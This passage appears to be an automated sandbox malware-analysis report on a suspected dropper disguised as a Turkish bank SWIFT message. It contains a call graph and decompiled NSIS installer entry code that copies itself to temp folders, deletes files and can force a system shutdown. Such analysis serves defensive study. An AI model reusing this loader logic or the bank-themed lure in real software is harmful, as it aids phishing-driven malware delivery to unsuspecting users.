API calls 3853->3857 3856 40541f 3854->3856 3859 405538 3855->3859 3858 40542d lstrcatA 3856->3858 3860 405438 lstrlenA FindFirstFileA 3856->3860 3857->3856 3858->3860 3859->3849 3862 405578 3 API calls 3859->3862 3861 405513 3860->3861 3865 40545c 3860->3865 3861->3850 3864 405542 3862->3864 3863 4055a3 CharNextA 3863->3865 3866 40573d 2 API calls 3864->3866 3865->3863 3872 4054f2 FindNextFileA 3865->3872 3878 40573d 2 API calls 3865->3878 3879 4053aa 59 API calls 3865->3879 3882 404e23 25 API calls 3865->3882 3883 404e23 25 API calls 3865->3883 3884 4057d3 38 API calls 3865->3884 3886 405a85 lstrcpynA 3865->3886 3867 405548 RemoveDirectoryA 3866->3867 3868 405553 3867->3868 3869 40556a 3867->3869 3868->3849 3870 405559 3868->3870 3871 404e23 25 API calls 3869->3871 3874 404e23 25 API calls 3870->3874 3871->3849 3872->3865 3875 40550a FindClose 3872->3875 3876 405561 3874->3876 3875->3861 3877 4057d3 38 API calls 3876->3877 3880 405568 3877->3880 3881 4054bf DeleteFileA 3878->3881 3879->3865 3880->3849 3881->3865 3882->3872 3883->3865 3884->3865 3885->3852 3886->3865 3887->3783 3888->3789 3890 405707 lstrlenA 3889->3890 3891 4056e5 lstrcmpiA 3890->3891 3892 405711 3890->3892 3891->3892 3893 4056fe CharNextA 3891->3893 3892->3796 3892->3797 3893->3890 3894->3800 4767 401ca5 4768 4029cb 18 API calls 4767->4768 4769 401cb5 SetWindowLongA 4768->4769 4770 40287d 4769->4770 4771 401a26 4772 4029cb 18 API calls 4771->4772 4773 401a2c 4772->4773 4774 4029cb 18 API calls 4773->4774 4775 4019d6 4774->4775 4776 4045aa 4777 4045d6 4776->4777 4778 4045ba 4776->4778 4780 404609 4777->4780 4781 4045dc SHGetPathFromIDListA 4777->4781 4787 40532a GetDlgItemTextA 4778->4787 4783 4045f3 SendMessageA 4781->4783 4784 4045ec 4781->4784 4782 4045c7 SendMessageA 4782->4777 4783->4780 4786 40140b 2 API calls 4784->4786 4786->4783 4787->4782 4788 402b2d 4789 402b55 4788->4789 4790 402b3c SetTimer 4788->4790 4791 402ba3 4789->4791 4792 402ba9 MulDiv 4789->4792 4790->4789 4793 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4792->4793 4793->4791 4795 401bad 4796 4029cb 18 API calls 4795->4796 4797 401bb4 4796->4797 4798 4029cb 18 API calls 4797->4798 4799 401bbe 4798->4799 4800 401bce 4799->4800 4802 4029e8 18 API calls 4799->4802 4801 401bde 4800->4801 4803 4029e8 18 API calls 4800->4803 4804 401be9 4801->4804 4805 401c2d 4801->4805 4802->4800 4803->4801 4806 4029cb 18 API calls 4804->4806 4807 4029e8 18 API calls 4805->4807 4808 401bee 4806->4808 4809 401c32 4807->4809 4810 4029cb 18 API calls 4808->4810 4811 4029e8 18 API calls 4809->4811 4812 401bf7 4810->4812 4813 401c3b FindWindowExA 4811->4813 4814 401c1d SendMessageA 4812->4814 4815 401bff SendMessageTimeoutA 4812->4815 4816 401c59 4813->4816 4814->4816 4815->4816 4817 40422e 4818 404264 4817->4818 4819 40423e 4817->4819 4821 403e9e 8 API calls 4818->4821 4820 403e37 19 API calls 4819->4820 4822 40424b SetDlgItemTextA 4820->4822 4823 404270 4821->4823 4822->4818 4824 402630 4825 4029e8 18 API calls 4824->4825 4826 402637 FindFirstFileA 4825->4826 4827 40265a 4826->4827 4831 40264a 4826->4831 4829 402661 4827->4829 4832 4059e3 wsprintfA 4827->4832 4833 405a85 lstrcpynA 4829->4833 4832->4829 4833->4831 4841 4024b0 4842 4024b5 4841->4842 4843 4024c6 4841->4843 4844 4029cb 18 API calls 4842->4844 4845 4029e8 18 API calls 4843->4845 4847 4024bc 4844->4847 4846 4024cd lstrlenA 4845->4846 4846->4847 4848 4024ec WriteFile 4847->4848 4849 40264e 4847->4849 4848->4849 3442 4015b3 3443 4029e8 18 API calls 3442->3443 3444 4015ba 3443->3444 3460 40560c CharNextA CharNextA 3444->3460 3446 40160a 3447 40162d 3446->3447 3448 40160f 3446->3448 3453 401423 25 API calls 3447->3453 3450 401423 25 API calls 3448->3450 3449 4055a3 CharNextA 3451 4015d0 CreateDirectoryA 3449->3451 3452 401616 3450->3452 3454 4015e5 GetLastError 3451->3454 3457 4015c2 3451->3457 3466 405a85 lstrcpynA 3452->3466 3459 40215b 3453->3459 3456 4015f2 GetFileAttributesA 3454->3456 3454->3457 3456->3457 3457->3446 3457->3449 3458 401621 SetCurrentDirectoryA 3458->3459 3461 405632 3460->3461 3462 405626 3460->3462 3464 4055a3 CharNextA 3461->3464 3465 40564f 3461->3465 3462->3461 3463 40562d CharNextA 3462->3463 3463->3465 3464->3461 3465->3457 3466->3458 3467 401734 3468 4029e8 18 API calls 3467->3468 3469 40173b 3468->3469 3470 401761 3469->3470 3471 401759 3469->3471 3522 405a85 lstrcpynA 3470->3522 3521 405a85 lstrcpynA 3471->3521 3474 40176c 3523 405578 lstrlenA CharPrevA 3474->3523 3475 40175f 3478 405ce3 5 API calls 3475->3478 3481 40177e 3478->3481 3483 401795 CompareFileTime 3481->3483 3484 401859 3481->3484 3485 401830 3481->3485 3488 405a85 lstrcpynA 3481->3488 3493 405aa7 18 API calls 3481->3493 3505 40575c GetFileAttributesA CreateFileA 3481->3505 3526 405d7c FindFirstFileA 3481->3526 3529 40573d GetFileAttributesA 3481->3529 3532 405346 3481->3532 3483->3481 3486 404e23 25 API calls 3484->3486 3487 404e23 25 API calls 3485->3487 3495 401845 3485->3495 3489 401863 3486->3489 3487->3495 3488->3481 3506 402f01 3489->3506 3492 40188a SetFileTime 3494 40189c FindCloseChangeNotification 3492->3494 3493->3481 3494->3495 3496 4018ad 3494->3496 3497 4018b2 3496->3497 3498 4018c5 3496->3498 3499 405aa7 18 API calls 3497->3499 3500 405aa7 18 API calls 3498->3500 3501 4018ba lstrcatA 3499->3501 3502 4018cd 3500->3502 3501->3502 3504 405346 MessageBoxIndirectA 3502->3504 3504->3495 3505->3481 3507 402f12 SetFilePointer 3506->3507 3508 402f2e 3506->3508 3507->3508 3536 40302c GetTickCount 3508->3536 3511 402f3f ReadFile 3512 402f5f 3511->3512 3520 401876 3511->3520 3513 40302c 42 API calls 3512->3513 3512->3520 3514 402f76 3513->3514 3515 402ff1 ReadFile 3514->3515 3517 402f86 3514->3517 3514->3520 3515->3520 3518 402fa1 ReadFile 3517->3518 3519 402fba WriteFile 3517->3519 3517->3520 3518->3517 3518->3520 3519->3517 3519->3520 3520->3492 3520->3494 3521->3475 3522->3474 3524 405592 lstrcatA 3523->3524 3525 401772 lstrcatA 3523->3525 3524->3525 3525->3475 3527 405d92 FindClose 3526->3527 3528 405d9d 3526->3528 3527->3528 3528->3481 3530 405759 3529->3530 3531 40574c SetFileAttributesA 3529->3531 3530->3481 3531->3530 3533 40535b 3532->3533 3534 4053a7 3533->3534 3535 40536f MessageBoxIndirectA 3533->3535 3534->3481 3535->3534 3537 403196 3536->3537 3538 40305b 3536->3538 3539 402bc5 32 API calls 3537->3539 3549 4031da SetFilePointer 3538->3549 3541 402f37 3539->3541 3541->3511 3541->3520 3542 403066 SetFilePointer 3544 40308b 3542->3544 3544->3541 3547 403120 WriteFile 3544->3547 3548 403177 SetFilePointer 3544->3548 3550 4031a8 ReadFile 3544->3550 3552 405e9d 3544->3552 3559 402bc5 3544->3559 3547->3541 3547->3544 3548->3537 3549->3542 3551 4031c9 3550->3551 3551->3544 3553 405ec2 3552->3553 3554 405eca 3552->3554 3553->3544 3554->3553 3555 405f51 GlobalFree 3554->3555 3556 405f5a GlobalAlloc 3554->3556 3557 405fd1 GlobalAlloc 3554->3557 3558 405fc8 GlobalFree 3554->3558 3555->3556 3556->3553 3556->3554 3557->3553 3557->3554 3558->3557 3560 402bd3 3559->3560 3561 402beb 3559->3561 3562 402be3 3560->3562 3563 402bdc DestroyWindow 3560->3563 3564 402bf3 3561->3564 3565 402bfb GetTickCount 3561->3565 3562->3544 3563->3562 3574 405ddc 3564->3574 3565->3562 3567 402c09 3565->3567 3568 402c11 3567->3568 3569 402c3e CreateDialogParamA 3567->3569 3568->3562 3578 402ba9 3568->3578 3569->3562 3571 402c1f wsprintfA 3572 404e23 25 API calls 3571->3572 3573 402c3c 3572->3573 3573->3562 3575 405df9 PeekMessageA 3574->3575 3576 405e09 3575->3576 3577 405def DispatchMessageA 3575->3577 3576->3562 3577->3575 3579 402bb8 3578->3579 3580 402bba MulDiv 3578->3580 3579->3580 3580->3571 4850 401634 4851 4029e8 18 API calls 4850->4851 4852 40163a 4851->4852 4853 405d7c 2 API calls 4852->4853 4854 401640 4853->4854 4855 401934 4856 4029cb 18 API calls 4855->4856 4857 40193b 4856->4857 4858 4029cb 18 API calls 4857->4858 4859 401945 4858->4859 4860 4029e8 18 API calls 4859->4860 4861 40194e 4860->4861 4862 401961 lstrlenA 4861->4862 4863 40199c 4861->4863 4864 40196b 4862->4864 4864->4863 4868 405a85 lstrcpynA 4864->4868 4866 401985 4866->4863 4867 401992 lstrlenA 4866->4867 4867->4863 4868->4866 4869 4019b5 4870 4029e8 18 API calls 4869->4870 4871 4019bc 4870->4871 4872 4029e8 18 API calls 4871->4872 4873 4019c5 4872->4873 4874 4019cc lstrcmpiA 4873->4874 4875 4019de lstrcmpA 4873->4875 4876 4019d2 4874->4876 4875->4876 4877 4014b7 4878 4014bd 4877->4878 4879 401389 2 API calls 4878->4879 4880 4014c5 4879->4880 4881 4025be 4882 4025c5 4881->4882 4885 40282a 4881->4885 4883 4029cb 18 API calls 4882->4883 4884 4025d0 4883->4884 4886 4025d7 SetFilePointer 4884->4886 4886->4885 4887 4025e7 4886->4887 4889 4059e3 wsprintfA 4887->4889 4889->4885

                                  Executed Functions

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 38 40333f 20->38 23 403311-403317 21->23 24 403303-40330c 21->24 30 403327-40332e 23->30 31 403319-403322 23->31 24->23 28 40330e 24->28 40 403411-403420 call 4035a6 OleUninitialize 25->40 41 4033ac-4033b2 25->41 26->25 26->40 28->23 30->20 36 403348-403354 call 405a85 30->36 31->30 35 403324 31->35 35->30 36->16 38->11 48 403426-403436 call 405346 ExitProcess 40->48 49 40350b-403511 40->49 42 403401-403408 call 4035e3 41->42 43 4033b4-4033bd call 4055a3 41->43 50 40340d 42->50 55 4033c8-4033ca 43->55 53 403513-403530 call 405da3 * 3 49->53 54 40358e-403596 49->54 50->40 80 403532-403534 53->80 81 40357a-403585 ExitWindowsEx 53->81 60 403598 54->60 61 40359c-4035a0 ExitProcess 54->61 56 4033cc-4033d6 55->56 57 4033bf-4033c5 55->57 62 4033d8-4033e5 call 405659 56->62 63 40343c-403456 lstrcatA lstrcmpiA 56->63 57->56 65 4033c7 57->65 60->61 62->40 74 4033e7-4033fd call 405a85 * 2 62->74 63->40 67 403458-40346d CreateDirectoryA SetCurrentDirectoryA 63->67 65->55 70 40347a-403494 call 405a85 67->70 71 40346f-403475 call 405a85 67->71 83 403499-4034b5 call 405aa7 DeleteFileA 70->83 71->70 74->42 80->81 84 403536-403538 80->84 81->54 87 403587-403589 call 40140b 81->87 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 84->81 88 40353a-40354c GetCurrentProcess 84->88 87->54 88->81 97 40354e-403570 88->97 92->83 95 4034ff-403506 call 4057d3 92->95 93->92 96 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->96 95->40 96->92 107 4034eb-4034f2 CloseHandle 96->107 97->81 107->92
                                  C-Code - Quality: 82%
                                  			_entry_() {
                                  				struct _SHFILEINFOA _v360;
                                  				struct _SECURITY_ATTRIBUTES* _v376;
                                  				char _v380;
                                  				CHAR* _v384;
                                  				char _v396;
                                  				int _v400;
                                  				int _v404;
                                  				CHAR* _v408;
                                  				intOrPtr _v412;
                                  				int _v416;
                                  				intOrPtr _v420;
                                  				struct _SECURITY_ATTRIBUTES* _v424;
                                  				void* _v432;
                                  				int _t34;
                                  				CHAR* _t39;
                                  				char* _t42;
                                  				signed int _t44;
                                  				void* _t48;
                                  				intOrPtr _t50;
                                  				signed int _t52;
                                  				signed int _t55;
                                  				int _t56;
                                  				signed int _t60;
                                  				void* _t79;
                                  				void* _t89;
                                  				void* _t91;
                                  				char* _t96;
                                  				signed int _t97;
                                  				void* _t98;
                                  				signed int _t99;
                                  				signed int _t100;
                                  				signed int _t103;
                                  				CHAR* _t105;
                                  				signed int _t106;
                                  				char _t120;
                                  
                                  				_v376 = 0;
                                  				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                  				_t99 = 0;
                                  				_v380 = 0x20;
                                  				__imp__#17();
                                  				_t34 = SetErrorMode(0x8001); // executed
                                  				__imp__OleInitialize(0); // executed
                                  				 *0x423f58 = _t34;
                                  				 *0x423ea4 = E00405DA3(8);
                                  				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                                  				E00405A85(0x4236a0, "NSIS Error");
                                  				_t39 = GetCommandLineA();
                                  				_t96 = "\"C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe\" ";
                                  				E00405A85(_t96, _t39);
                                  				 *0x423ea0 = GetModuleHandleA(0);
                                  				_t42 = _t96;
                                  				if("\"C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe\" " == 0x22) {
                                  					_v404 = 0x22;
                                  					_t42 =  &M00429001;
                                  				}
                                  				_t44 = CharNextA(E004055A3(_t42, _v404));
                                  				_v404 = _t44;
                                  				while(1) {
                                  					_t91 =  *_t44;
                                  					_t109 = _t91;
                                  					if(_t91 == 0) {
                                  						break;
                                  					}
                                  					__eflags = _t91 - 0x20;
                                  					if(_t91 != 0x20) {
                                  						L5:
                                  						__eflags =  *_t44 - 0x22;
                                  						_v404 = 0x20;
                                  						if( *_t44 == 0x22) {
                                  							_t44 = _t44 + 1;
                                  							__eflags = _t44;
                                  							_v404 = 0x22;
                                  						}
                                  						__eflags =  *_t44 - 0x2f;
                                  						if( *_t44 != 0x2f) {
                                  							L15:
                                  							_t44 = E004055A3(_t44, _v404);
                                  							__eflags =  *_t44 - 0x22;
                                  							if(__eflags == 0) {
                                  								_t44 = _t44 + 1;
                                  								__eflags = _t44;
                                  							}
                                  							continue;
                                  						} else {
                                  							_t44 = _t44 + 1;
                                  							__eflags =  *_t44 - 0x53;
                                  							if( *_t44 == 0x53) {
                                  								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                  								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                  									_t99 = _t99 | 0x00000002;
                                  									__eflags = _t99;
                                  								}
                                  							}
                                  							__eflags =  *_t44 - 0x4352434e;
                                  							if( *_t44 == 0x4352434e) {
                                  								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                  								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                  									_t99 = _t99 | 0x00000004;
                                  									__eflags = _t99;
                                  								}
                                  							}
                                  							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                  							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                  								 *((intOrPtr*)(_t44 - 2)) = 0;
                                  								__eflags = _t44 + 2;
                                  								E00405A85("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t44 + 2);
                                  								L20:
                                  								_t105 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                                  								GetTempPathA(0x400, _t105); // executed
                                  								_t48 = E004031F1(_t109);
                                  								_t110 = _t48;
                                  								if(_t48 != 0) {
                                  									L22:
                                  									DeleteFileA("1033"); // executed
                                  									_t50 = E00402C5B(_t111, _t99); // executed
                                  									_v412 = _t50;
                                  									if(_t50 != 0) {
                                  										L32:
                                  										E004035A6();
                                  										__imp__OleUninitialize();
                                  										if(_v408 == 0) {
                                  											__eflags =  *0x423f34;
                                  											if( *0x423f34 != 0) {
                                  												_t106 = E00405DA3(3);
                                  												_t100 = E00405DA3(4);
                                  												_t55 = E00405DA3(5);
                                  												__eflags = _t106;
                                  												_t97 = _t55;
                                  												if(_t106 != 0) {
                                  													__eflags = _t100;
                                  													if(_t100 != 0) {
                                  														__eflags = _t97;
                                  														if(_t97 != 0) {
                                  															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                  															__eflags = _t60;
                                  															if(_t60 != 0) {
                                  																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                  																_v416 = 1;
                                  																_v404 = 2;
                                  																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t56 = ExitWindowsEx(2, 0);
                                  												__eflags = _t56;
                                  												if(_t56 == 0) {
                                  													E0040140B(9);
                                  												}
                                  											}
                                  											_t52 =  *0x423f4c;
                                  											__eflags = _t52 - 0xffffffff;
                                  											if(_t52 != 0xffffffff) {
                                  												_v400 = _t52;
                                  											}
                                  											ExitProcess(_v400);
                                  										}
                                  										E00405346(_v408, 0x200010);
                                  										ExitProcess(2);
                                  									}
                                  									if( *0x423ebc == 0) {
                                  										L31:
                                  										 *0x423f4c =  *0x423f4c | 0xffffffff;
                                  										_v400 = E004035E3();
                                  										goto L32;
                                  									}
                                  									_t103 = E004055A3(_t96, 0);
                                  									while(_t103 >= _t96) {
                                  										__eflags =  *_t103 - 0x3d3f5f20;
                                  										if(__eflags == 0) {
                                  											break;
                                  										}
                                  										_t103 = _t103 - 1;
                                  										__eflags = _t103;
                                  									}
                                  									_t115 = _t103 - _t96;
                                  									_v408 = "Error launching installer";
                                  									if(_t103 < _t96) {
                                  										lstrcatA(_t105, "~nsu.tmp");
                                  										if(lstrcmpiA(_t105, "C:\\Users\\frontdesk\\Desktop") == 0) {
                                  											goto L32;
                                  										}
                                  										CreateDirectoryA(_t105, 0);
                                  										SetCurrentDirectoryA(_t105);
                                  										_t120 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
                                  										if(_t120 == 0) {
                                  											E00405A85("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", "C:\\Users\\frontdesk\\Desktop");
                                  										}
                                  										E00405A85(0x424000, _v396);
                                  										 *0x424400 = 0x41;
                                  										_t98 = 0x1a;
                                  										do {
                                  											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                                  											DeleteFileA(0x41f050);
                                  											if(_v416 != 0 && CopyFileA("C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe", 0x41f050, 1) != 0) {
                                  												_push(0);
                                  												_push(0x41f050);
                                  												E004057D3();
                                  												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                                  												_t79 = E004052E5(0x41f050);
                                  												if(_t79 != 0) {
                                  													CloseHandle(_t79);
                                  													_v416 = 0;
                                  												}
                                  											}
                                  											 *0x424400 =  *0x424400 + 1;
                                  											_t98 = _t98 - 1;
                                  										} while (_t98 != 0);
                                  										_push(0);
                                  										_push(_t105);
                                  										E004057D3();
                                  										goto L32;
                                  									}
                                  									 *_t103 = 0;
                                  									_t104 = _t103 + 4;
                                  									if(E00405659(_t115, _t103 + 4) == 0) {
                                  										goto L32;
                                  									}
                                  									E00405A85("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t104);
                                  									E00405A85("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t104);
                                  									_v424 = 0;
                                  									goto L31;
                                  								}
                                  								GetWindowsDirectoryA(_t105, 0x3fb);
                                  								lstrcatA(_t105, "\\Temp");
                                  								_t89 = E004031F1(_t110);
                                  								_t111 = _t89;
                                  								if(_t89 == 0) {
                                  									goto L32;
                                  								}
                                  								goto L22;
                                  							}
                                  							goto L15;
                                  						}
                                  					} else {
                                  						goto L4;
                                  					}
                                  					do {
                                  						L4:
                                  						_t44 = _t44 + 1;
                                  						__eflags =  *_t44 - 0x20;
                                  					} while ( *_t44 == 0x20);
                                  					goto L5;
                                  				}
                                  				goto L20;
                                  			}






































                                  0x00403231
                                  0x00403235
                                  0x0040323d
                                  0x0040323f
                                  0x00403244
                                  0x0040324f
                                  0x00403256
                                  0x0040325e
                                  0x00403268
                                  0x0040327e
                                  0x0040328e
                                  0x00403293
                                  0x00403299
                                  0x004032a0
                                  0x004032b3
                                  0x004032b8
                                  0x004032ba
                                  0x004032bc
                                  0x004032c1
                                  0x004032c1
                                  0x004032d1
                                  0x004032d7
                                  0x00403340
                                  0x00403340
                                  0x00403342
                                  0x00403344
                                  0x00000000
                                  0x00000000
                                  0x004032dd
                                  0x004032e0
                                  0x004032e8
                                  0x004032e8
                                  0x004032eb
                                  0x004032f0
                                  0x004032f2
                                  0x004032f2
                                  0x004032f3
                                  0x004032f3
                                  0x004032f8
                                  0x004032fb
                                  0x00403330
                                  0x00403335
                                  0x0040333a
                                  0x0040333d
                                  0x0040333f
                                  0x0040333f
                                  0x0040333f
                                  0x00000000
                                  0x004032fd
                                  0x004032fd
                                  0x004032fe
                                  0x00403301
                                  0x00403309
                                  0x0040330c
                                  0x0040330e
                                  0x0040330e
                                  0x0040330e
                                  0x0040330c
                                  0x00403311
                                  0x00403317
                                  0x0040331f
                                  0x00403322
                                  0x00403324
                                  0x00403324
                                  0x00403324
                                  0x00403322
                                  0x00403327
                                  0x0040332e
                                  0x00403348
                                  0x0040334b
                                  0x00403354
                                  0x00403359
                                  0x00403359
                                  0x00403364
                                  0x0040336a
                                  0x0040336f
                                  0x00403371
                                  0x00403393
                                  0x00403398
                                  0x0040339f
                                  0x004033a6
                                  0x004033aa
                                  0x00403411
                                  0x00403411
                                  0x00403416
                                  0x00403420
                                  0x0040350b
                                  0x00403511
                                  0x0040351c
                                  0x00403525
                                  0x00403527
                                  0x0040352c
                                  0x0040352e
                                  0x00403530
                                  0x00403532
                                  0x00403534
                                  0x00403536
                                  0x00403538
                                  0x00403548
                                  0x0040354a
                                  0x0040354c
                                  0x00403559
                                  0x00403568
                                  0x00403570
                                  0x00403578
                                  0x00403578
                                  0x0040354c
                                  0x00403538
                                  0x00403534
                                  0x0040357d
                                  0x00403583
                                  0x00403585
                                  0x00403589
                                  0x00403589
                                  0x00403585
                                  0x0040358e
                                  0x00403593
                                  0x00403596
                                  0x00403598
                                  0x00403598
                                  0x004035a0
                                  0x004035a0
                                  0x0040342f
                                  0x00403436
                                  0x00403436
                                  0x004033b2
                                  0x00403401
                                  0x00403401
                                  0x0040340d
                                  0x00000000
                                  0x0040340d
                                  0x004033bb
                                  0x004033c8
                                  0x004033bf
                                  0x004033c5
                                  0x00000000
                                  0x00000000
                                  0x004033c7
                                  0x004033c7
                                  0x004033c7
                                  0x004033cc
                                  0x004033ce
                                  0x004033d6
                                  0x00403442
                                  0x00403456
                                  0x00000000
                                  0x00000000
                                  0x0040345a
                                  0x00403461
                                  0x00403467
                                  0x0040346d
                                  0x00403475
                                  0x00403475
                                  0x00403483
                                  0x0040348a
                                  0x00403493
                                  0x00403499
                                  0x004034a5
                                  0x004034ab
                                  0x004034b5
                                  0x004034c9
                                  0x004034ca
                                  0x004034cb
                                  0x004034dc
                                  0x004034e2
                                  0x004034e9
                                  0x004034ec
                                  0x004034f2
                                  0x004034f2
                                  0x004034e9
                                  0x004034f6
                                  0x004034fc
                                  0x004034fc
                                  0x004034ff
                                  0x00403500
                                  0x00403501
                                  0x00000000
                                  0x00403501
                                  0x004033d8
                                  0x004033da
                                  0x004033e5
                                  0x00000000
                                  0x00000000
                                  0x004033ed
                                  0x004033f8
                                  0x004033fd
                                  0x00000000
                                  0x004033fd
                                  0x00403379
                                  0x00403385
                                  0x0040338a
                                  0x0040338f
                                  0x00403391
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403391
                                  0x00000000
                                  0x0040332e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004032e2
                                  0x004032e2
                                  0x004032e2
                                  0x004032e3
                                  0x004032e3
                                  0x00000000
                                  0x004032e2
                                  0x00000000

                                  APIs
                                  • #17.COMCTL32 ref: 00403244
                                  • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                                  • OleInitialize.OLE32(00000000), ref: 00403256
                                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                  • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                                  • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,00000000), ref: 004032A6
                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,00000020), ref: 004032D1
                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403379
                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403385
                                  • DeleteFileA.KERNELBASE(1033), ref: 00403398
                                  • OleUninitialize.OLE32(00000000), ref: 00403416
                                  • ExitProcess.KERNEL32 ref: 00403436
                                  • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,00000000,00000000), ref: 00403442
                                  • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,00000000,00000000), ref: 0040344E
                                  • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040345A
                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 00403461
                                  • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                                  • CopyFileA.KERNEL32 ref: 004034BF
                                  • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                                  • ExitWindowsEx.USER32 ref: 0040357D
                                  • ExitProcess.KERNEL32 ref: 004035A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                  • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                  • API String ID: 2278157092-2117790394
                                  • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                                  • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                                  • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                                  • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
